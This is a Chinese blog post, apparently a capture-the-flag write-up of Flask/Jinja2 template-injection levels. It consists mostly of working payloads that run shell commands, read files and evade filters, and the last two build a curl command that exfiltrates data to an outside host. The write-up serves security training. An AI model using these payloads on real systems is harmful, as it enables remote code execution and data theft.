第七周靶场练习及心得

最新推荐文章于 2024-07-10 08:53:12 发布
最新推荐文章于 2024-07-10 08:53:12 发布
阅读量80 收藏
点赞数
文章标签: flask php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Vicissitud/article/details/129332197
版权

先一起来认识一下吧

ssti漏洞成因

ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。本文着重对flask模板注入进行浅析。

web361

?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../'). read() }}   shell命令​?name={{ config.__class__.__init__.__globals__['os'].popen ('cat ../flag').read() }}
?name={{().__class__.__mro__[-1].__subclasses__()[132].__init__.__global s__['popen']('cat /flag').read()}}

web362

和上方一样

web363

过滤了引号

request.args绕过

上面的  'os'  就可以写为  request.args.a&a=os

?name={{ config.__class__.__init__.__globals__[request.args.a].popen(request.args.b).read() }}&a=os&b=cat ../flag

web364

在上面的基础上过滤了args

request.args是GET传参,可以使用其他方式来代替args,如cookie

?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}
 
Cookie:a=os;b=popen;c=cat /flag

web365

在上面的基础上过滤了中括号  []

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}
 
Cookie:a=cat /flag

web366

在上面的基础上要绕过url_for和__globals__

这里用attr方法:request|attr(request.cookies.a)等价于request[“a”]

?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
 
Cookie:a=__globals__;b=cat /flag

web367

过滤OS再用attr方法绕过

?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
 
Cookie:a=__globals__;b=os;c=cat /flag

web368

?name={% print(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read() %}
 
Cookie:a=__globals__;b=os;c=cat /flag

过滤了{{ 用print绕过的 

web369

去掉了request

{%%}执行代码、拼接字符赋值给变量。

?name=
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{%print(x.open(file).read())%}
 
{% set po=dict(po=a,p=a)|join%}  #通过dict()和join构造pop
 
{% set a=(()|select|string|list)|attr(po)(24)%} #a等价于下划线
 
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}  #通过拼接得到__init__
#glo、geti、built同理
#再往后,调用chr,构造/flag,读取文件

 

web370

过滤引号、args、中括号、下划线、os、花括号、request、数字

def half2full(half):
    full = ''
    for ch in half:
        if ord(ch) in range(33, 127):
            ch = chr(ord(ch) + 0xfee0)
        elif ord(ch) == 32:
            ch = chr(0x3000)
        else:
            pass
        full += ch
    return full
while 1:
    t = ''
    s = input("输入想要转换的数字字符串:")
    for i in s:
        t += half2full(i)
    print(t)
?name=
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set coun=(cc~cccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{%print(x.open(file).read())%}

 

web371

过滤了 print,这里采用反弹 shell 的方式来获取 FLAG

{% set b=(t|length)%}
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,ccc,ccccccccc,ccccc,point,cc,cccccccccc,ccccc,point,c,cccc,ccccccccc,point,c,b,cccccc,maohao,ccccccccc,cccccccc,ccccccc,ccccccccc,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

web372

过滤了 print,这里采用采用反弹 shell 的方式来获取 FLAG,过滤的 count 用 length 来代替

{% set b=(t|length)%}
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,ccc,ccccccccc,ccccc,point,cc,cccccccccc,ccccc,point,c,cccc,ccccccccc,point,c,b,cccccc,maohao,ccccccccc,cccccccc,ccccccc,ccccccccc,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

Vicissitud
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队打靶练习:SECTALKS: BNE0X03 - SIMPLE
分享
12-14 417
红队打靶练习:SECTALKS: BNE0X03 - SIMPLE
第七靶场练习心得(2)
Vicissitud的博客
03-10 501
第七靶场练习心得(2)
dvwa靶场第四练习以及心得(2)
Vicissitud的博客
02-15 198
dvwa靶场第四练习以及心得(2)
dvwa靶场第四练习以及心得(1)
Vicissitud的博客
02-15 130
dvwa靶场第四练习以及心得(1)
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
网络安全技术练习靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
sqli-labs靶场练习wp的配图.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
我的靶场以及心得.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
Flask从入门到精通:第一课:flask的基本介绍、flask快速搭建项目并运行】
weixin_50556117的博客
07-10 846
旧的常用框架:django(3.0以后支持异步),flask(2.0以后支持异步)和 tornado(异步),twisted(异步)新的常用框架:FastAPI,sanic,django4.0(目前的版本属于从同步到异步改造过程中),flask2.0(目前的版本属于从同步到异步改造过程中)
基于Gunicorn、Flask和Docker的高并发部署实践
eclipsercp的博客
07-07 867
利用Kubernetes等工具实现应用的自动伸缩。本文通过具体的代码示例和配置步骤,展示了如何实现基于Gunicorn、Flask和Docker的高并发Web应用部署。通过这些实践,可以构建一个高效、稳定且易于维护的Web服务。
基于Gunicorn+Flask+Docker模型高并发部署
FLK_9090的博客
07-07 656
在现代Web应用开发中,高并发处理能力是一个非常重要的需求。本文将详细介绍如何使用Gunicorn、Flask和Docker来部署一个能够处理高并发请求的Web应用。我们将逐步讲解每一步的实现,以确保你能够完全理解并应用到自己的项目中。通过本文的步骤,我们已经成功地创建了一个基于Flask的Web应用,并使用Gunicorn和Docker进行了高并发部署。我们还介绍了如何进行性能优化和调优。这种方法不仅提高了应用的并发处理能力,还简化了部署和管理过程。希望这篇文章能对你有所帮助。
攻防世界 Web_python_template_injection(flask模版注入)
weixin_73399382的博客
07-06 586
通过调用__class__.__mro__,可以获取该类的方法解析顺序(Method Resolution Order,MRO),它是一个元组,按照查找方法时的顺序列出了对象所属类及其父类。解析:"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes),而不是对象(objects)。综上所述,"".__class__.__mro__[2].__subclasses__()方法返回的是可用类(classes)SSTI与这个方法密不可分。
基于gunicorn+flask+docker模型高并发部署
4.0啊的博客
07-07 508
通过使用gunicorn,我们可以确保我们的Flask应用程序能够处理大量并发请求,同时保持较低的延迟。通过这种方式,我们可以确保我们的应用程序能够处理大量并发请求,同时保持较低的延迟。在这篇博客文章中,我们将一起探索如何使用gunicorn、Flask和Docker来构建一个高并发的Web应用程序。这里,“myapp”是我们的Flask应用程序模块名,而“app”是Flask应用程序实例的变量名。现在,我们已经成功地将我们的Flask应用程序、gunicorn和所有依赖项打包到了一个Docker容器中。
解锁数据宝藏:Microsoft Graph API的统一数据革命
07-09 751
在当今由数据驱动的世界中,企业和开发人员必须有效地访问和管理数据。Microsoft 图形 API用作连接 Microsoft 服务的网关,例如 Office 365 Azure AD、OneDrive、Teams 等。通过利用 Microsoft 图形 API,公司可以简化数据访问、改善协作并从数据中提取见解。本文深入探讨了 Microsoft 图形 API 的功能。如何使用它...
Flask 不同版本项目的终端命令运行方式
eclipsercp的博客
07-08 499
Flask作为一个灵活且轻量级的Web框架,随着版本更新,其核心功能保持相对稳定,但项目结构和部署方式可能有所变化。这里将详细介绍几种常见的Flask项目结构及其对应的终端命令运行方式。
flask使用定时任务flask_apscheduler(APScheduler)
weixin_41934979的博客
07-07 688
flask使用定时任务,flask_apscheduler、APScheduler
基于Python的哔哩哔哩数据分析系统设计实现过程,技术使用flask、MySQL、echarts,前端使用Layui
最新发布
weixin_49081159的博客
07-10 2537
在B站数据分析系统中,通过使用gensim库中的LDA模型,对B站视频标题和弹幕文本进行主题建模,帮助用户发现视频的关键主题和热门话题,提供更深入的数据分析和洞察。相关领域的研究者和开发者通过使用Python编程语言及其丰富的数据处理和可视化库,结合B站平台的数据接口和爬虫技术,实现了B站数据的采集、清洗和预处理。未来的研究方向包括优化系统的性能和用户体验,深化对B站数据的挖掘和应用,提升系统的智能化和个性化水平,以满足用户的多样化需求和持续发展的B站平台。登录成功后,用户可以使用系统提供的各种功能。
sqlmap靶场练习
09-06
对于SQL注入漏洞的测试和练习,可以使用一些特定的靶场网站来进行实践。这些靶场网站专门设计用于测试和学习SQL注入攻击。 以下是一些常用的SQL注入靶场网站: 1. WebGoat:一个开源的Java web应用程序,提供了多种漏洞类型的实验和学习机会,包括SQL注入。 2. DVWA(Damn Vulnerable Web Application):一个专门为安全测试而制作的PHP/MySQL web应用程序,其中包含各种漏洞类型,包括SQL注入。 3. bWAPP(Buggy Web Application):一个基于PHP的漏洞应用程序,提供了大量的漏洞类型,包括SQL注入。 4. HackThisSite:一个非常受欢迎的在线平台,提供了各种各样的安全挑战,包括SQL注入。 5. Mutillidae:一个用于学习和教学目的的漏洞应用程序,提供了多个漏洞类型的实验机会,包括SQL注入。 使用这些靶场网站,你可以通过尝试各种SQL注入技术来练习和提升你的技能。请注意,在进行测试时,确保只在合法授权和合规的环境中进行,遵循法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值